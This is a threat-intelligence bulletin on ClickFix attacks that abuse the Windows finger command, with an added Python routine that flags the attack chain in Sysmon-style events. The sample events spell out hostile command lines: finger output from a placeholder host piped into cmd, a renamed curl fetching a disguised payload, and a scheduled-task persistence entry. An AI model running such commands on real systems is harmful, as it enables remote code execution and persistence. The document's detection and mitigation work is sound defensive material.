Decades-Old ‘Finger' Protocol Abused in Clickfix Malware Attacks
Summary:
Threat actors are reviving the decades-old finger command as part of new ClickFix-style social-engineering attacks on Windows systems. Originally designed to look up information about remote users over TCP port 79, the finger protocol is now being abused as a lightweight remote command-delivery mechanism. Recent campaigns trick victims, often through fake CAPTCHA prompts, into executing a command that retrieves attacker-hosted commands and immediately executes them.
These attacks typically follow a sequence:
- Use finger to pull down a command stream from an attacker-controlled server.
- Create random file paths and duplicate curl[.]exe under a random name.
- Use the renamed curl to download a ZIP file disguised as a PDF.
- Extract and run malware (a Python-based infostealer or the NetSupport Manager RAT).
- Establish persistence via scheduled tasks (newer variants only).
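The sequence above gives defenders several host-level observables: finger output piped into a command interpreter, an outbound connection on TCP/79, a copy of curl running under a name other than curl.exe, and a scheduled task whose action lives in a user-writable directory. The following detection routine, added here as an example and not part of the original article or any vendor's tooling, walks Sysmon-style process-creation (Event 1) and network-connection (Event 3) records and flags each of those stages. The event records, hostnames and file paths are constructed for the example; the field names follow Sysmon's conventions, but the input is assumed to have already been parsed into dictionaries.

```python
"""Flag the finger/ClickFix chain in Sysmon-style process and network records.

Added example: the SAMPLE_EVENTS below are constructed, not real telemetry.
"""
import ntpath
import re
from typing import Dict, List, Tuple

Event = Dict[str, object]
Finding = Tuple[int, str, str]  # (event index, rule name, description)

# finger.exe output piped into a command interpreter, e.g. "finger a@b | cmd"
FINGER_PIPE_RE = re.compile(
    r"\bfinger(?:\.exe)?\b[^|]*\|\s*(?:cmd|powershell|pwsh)(?:\.exe)?\b",
    re.IGNORECASE,
)
# schtasks /create whose task action points into a user-writable location
SCHTASKS_CREATE_RE = re.compile(r"\bschtasks(?:\.exe)?\b.*\s/create\b", re.IGNORECASE)
USER_WRITABLE_RE = re.compile(r"\\(?:Temp|AppData|ProgramData|Public)\\", re.IGNORECASE)
FINGER_PORT = 79


def _basename(path: object) -> str:
    """Lower-cased file name of a Windows path (ntpath works on any host OS)."""
    return ntpath.basename(str(path)).lower()


def detect(events: List[Event]) -> List[Finding]:
    """Return one finding per matched rule, in event order."""
    findings: List[Finding] = []
    for i, ev in enumerate(events):
        event_id = ev.get("EventID")
        image = _basename(ev.get("Image", ""))
        cmdline = str(ev.get("CommandLine", ""))

        if event_id == 1:  # process creation
            if FINGER_PIPE_RE.search(cmdline):
                findings.append((i, "finger_piped_to_shell",
                                 "finger output piped into cmd/powershell"))
            # Sysmon's OriginalFileName comes from the PE version resource, so a
            # renamed copy of curl.exe still reports curl.exe here.
            if str(ev.get("OriginalFileName", "")).lower() == "curl.exe" and image != "curl.exe":
                findings.append((i, "renamed_curl",
                                 f"curl.exe running as {image}"))
            if SCHTASKS_CREATE_RE.search(cmdline) and USER_WRITABLE_RE.search(cmdline):
                findings.append((i, "schtask_user_writable_path",
                                 "scheduled task action in a user-writable directory"))

        elif event_id == 3:  # network connection
            if ev.get("DestinationPort") == FINGER_PORT or image == "finger.exe":
                findings.append((i, "finger_network_connection",
                                 f"{image} connected to TCP/{ev.get('DestinationPort')}"))
    return findings


# Constructed sample telemetry: hostnames, IPs and paths are placeholders.
SAMPLE_EVENTS: List[Event] = [
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'cmd /c "finger user@finger.example.invalid | cmd"'},
    {"EventID": 3, "Image": r"C:\Windows\System32\finger.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 79},
    {"EventID": 1, "Image": r"C:\Users\u\AppData\Local\Temp\a1b2c3\k9x.exe",
     "OriginalFileName": "curl.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"k9x.exe -o C:\Users\u\AppData\Local\Temp\a1b2c3\report.pdf https://files.example.invalid/report.pdf"},
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe", "OriginalFileName": "schtasks.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'schtasks /create /tn "WinUpd" /tr "C:\Users\u\AppData\Local\Temp\a1b2c3\svc.exe" /sc minute /mo 5'},
    # benign: curl under its own name, and a browser talking HTTPS
    {"EventID": 1, "Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": "curl -V"},
    {"EventID": 3, "Image": r"C:\Program Files\Browser\browser.exe",
     "DestinationIp": "203.0.113.20", "DestinationPort": 443},
]


if __name__ == "__main__":
    for idx, rule, desc in detect(SAMPLE_EVENTS):
        print(f"event[{idx}] {rule}: {desc}")
```

The network rule fires on any outbound TCP/79 connection regardless of the process name, which is the monitoring counterpart to the port-79 egress block recommended below: in most environments a single hit on that port is worth a ticket on its own. The renamed-curl rule depends on the PE version resource surviving the copy, which it does when the binary is simply duplicated under a new name as described in the chain.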
Security Officer Comments:
The renewed abuse of the finger protocol highlights a common trend: attackers increasingly repurpose legacy or obscure network utilities as LOLBINs to evade detection. Because finger is still present on Windows but almost never legitimately used, defenders may overlook it in monitoring, even though its output can be silently piped into cmd[.]exe to execute arbitrary code. The campaign's alignment with ClickFix techniques (social engineering, fake CAPTCHA challenges, and human-in-the-loop execution) underscores that attackers continue to rely on user interaction to bypass technical controls. The inclusion of anti-analysis checks in newer samples suggests this actor is actively refining its tooling and intends to continue leveraging finger as a low-noise command-delivery channel. The shift from lightweight Python malware to a full-featured RAT such as NetSupport Manager also indicates an interest in longer-term access and remote control rather than simple credential theft.
Suggested Corrections:
While the current 'finger' abuse appears to be carried out by a single threat actor conducting ClickFix attacks, people continue to fall for these lures, so it is essential to be aware of the campaigns. For defenders, the most direct way to block use of the finger command is to block outgoing traffic to TCP port 79, the port used to connect to a daemon over the Finger protocol. User awareness remains critical: ClickFix continues to succeed because users are pressured into running commands manually.
Link(s):
https://www.bleepingcomputer.com/ne...-protocol-abused-in-clickfix-malware-attacks/